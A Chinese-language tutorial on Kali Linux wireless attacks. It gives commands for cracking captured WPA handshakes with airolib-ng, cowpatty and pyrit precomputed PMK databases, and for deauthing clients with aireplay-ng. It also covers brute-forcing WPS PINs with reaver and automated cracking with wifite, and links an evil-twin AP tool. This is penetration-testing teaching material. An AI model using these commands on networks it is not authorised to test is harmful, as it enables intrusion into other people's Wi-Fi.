kali linux之无线渗透（续）

Airolib

设计用于存储ESSID和密码列表，计算生成不变的PMK（计算资源消耗型）

PMK在破解阶段被用于计算PTK（速度快，计算资源要求少）

通过完整性摘要值破解密码SQLite3数据库存储数据

实例：

抓包获取四步信息

echo 目标ESSID > essid.txt（创建一个ESSID文件）
airolib-ng db --import essid essid.txt（创建一个数据库db，导入一个essid，这个essid文件存在essid.txt文件里）
airolib-ng db --stats（查看数据库状态）
airolib-ng db --import passwd /usr/share/wordlists/xxx.txt（导入密码文件，它会剔除不合格的密码）
airolib-ng db --batch（生成PMK）
aircrack-ng -r db test-01.cap（通过抓取到的包对比db数据库里面的PMK破解密码）

Cowpatty破解密码

一样的，先抓包获取四步信息

cowpatty -r xx-01.cap -f password.txt -s 目标essid (-r 指定抓到包的文件,-f 使用的字典,-s 目标essid)

使用彩虹表（PMK）

genpmk -f password.txt -d pmk -s 目标essid (-f 使用的字典 -d生成的pmk文件名 -s 目标essid)

cowpatty -r xx-01.cap -d pmk -s 目标essid (-r 指定抓到包的文件,-d 指定pmk文件,-s 目标essid)

Pyrit破解密码

与airolib,cowpatty相同,支持基于预计算的pmk提高破解速度

独有的优势:

CPU外,可以运用GPU的计算能力加速生成PMK,本身支持抓包获取四步握手过程,无需airodump抓包

也支持传统的读取airodump抓包获取四步握手的方式

实例:

pyrit -r wlan0mon -o wap.cap stripLive (-r 指定抓包的网卡,-o 输出文件名 stripLive是踢出多余的信息)

然后配合aireplay-ng把目标打掉,获取四步信息

会生成一个抓包文件

分析包(analyze)

从airodump抓包导入并筛选提取出新的包,剔除多余的信息

会生成新的包

可以直接用密码字典破解,但是没灵魂,使用数据库模式破解

默认基于文件的数据库,支持sql数据库,将计算的PMK存入数据库

查看默认数据库状态:pyrit eval

导入密码字典:pyrit -i password.txt import_passwords(会剔除不合格的密码)

指定ESSID:pyrit -e ESSID名 create_essid (创建essid)

计算PMK:pyrit batch (发挥GPU计算能力)

破解密码:pyrit -r wap01.cap -b APmac attack_db

实例:

导入密码文件

查看可用密码文件

创建essid

计算PMK

破解密码

WPS攻击

WPS是wifi联盟2006年开发的一项技术,通过pin码来简化无线接入的操作,无需记住PSK,路由器和网卡名各按一个按钮就能接入无线.pin码是分为前后各4位的2段共8位数字

2011年被发现安全漏洞,接入发起方可以根据路由器的返回信息判断前4位是否正确,而pin码的后四位只有1000种定义的组合(最后一位是checksum),所以全部穷举破解只需要11000次尝试,(PSK 218,340,105,584,896),标准本身没有设定锁定机制,目前多个厂商已实现锁定机制

wash -i wlan0mon (发现支持wps的无线)

airodump-ng wlan0mon --wps (也可以加上--wps参数)

爆破PIN码

reaver -i wlan0mon -b APmac -vv

爆破出pin码后

reaver -i wlan0mon -b APmac -vv -p PIN码

综合自动化无线密码破解工具:wifite

ctrl+c停止扫描,选择目标

它会自动逐个尝试,WPS,握手包等等

伪造AP:3vilTwinAttacker  https://github.com/wi-fi-analyzer/3vilTwinAttacker.git

友情链接  http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn